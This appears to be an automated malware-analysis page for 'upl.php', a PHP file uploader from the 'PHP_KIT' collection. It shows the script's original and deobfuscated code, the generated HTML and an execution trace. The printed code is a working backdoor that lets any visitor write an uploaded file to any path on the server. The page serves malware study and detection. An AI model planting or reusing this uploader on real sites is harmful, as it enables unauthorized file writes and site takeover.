PHP Malware Analysis
upl.php
md5: 9b8c77bd232c23e68c745843d61a7580
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Files
- copy (Deobfuscated, HTML, Original)
Input
- _POST (Deobfuscated, HTML, Original)
- HTTP_POST_FILES (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<?php
//// PHP_KIT//// up.php = File Upload//// by: The Dark Raver// modified: 21/01/2004//
?> <html><body> <form enctype="multipart/form-data" action="" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000"><p>Local File: <input name="userfile" type="file"><p>Remote File: <input name="remotefile" type="text"><input type="submit" value="Send"></form><br><br><br> <?php
if (is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);
echo "Uploaded file: " . $HTTP_POST_FILES['userfile']['name'];
} else {
echo "No File Uploaded";
}
?> </html></body>Execution traces
data/traces/9b8c77bd232c23e68c745843d61a7580_trace-1676248076.512.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:28:22.409836]
1 0 1 0.000162 393512
1 3 0 0.000202 393800 {main} 1 /var/www/html/uploads/upl.php 0 0
1 3 1 0.000219 393800
0.000244 314224
TRACE END [2023-02-12 22:28:22.409954]
Generated HTML code
<html><head></head><body> <form enctype="multipart/form-data" action="" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000"><p>Local File: <input name="userfile" type="file"></p><p>Remote File: <input name="remotefile" type="text"><input type="submit" value="Send"></p></form><br><br><br> <!--? if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) { copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']); echo "Uploaded file: " . $HTTP_POST_FILES['userfile']['name'];} else { echo "No File Uploaded";} ?--> </body></html>Original PHP code
<?//// PHP_KIT//// up.php = File Upload//// by: The Dark Raver// modified: 21/01/2004//?> <html><body> <form enctype="multipart/form-data" action="" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000"><p>Local File: <input name="userfile" type="file"><p>Remote File: <input name="remotefile" type="text"><input type="submit" value="Send"></form><br><br><br> <? if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) { copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']); echo "Uploaded file: " . $HTTP_POST_FILES['userfile']['name'];} else { echo "No File Uploaded";} ?> </html></body>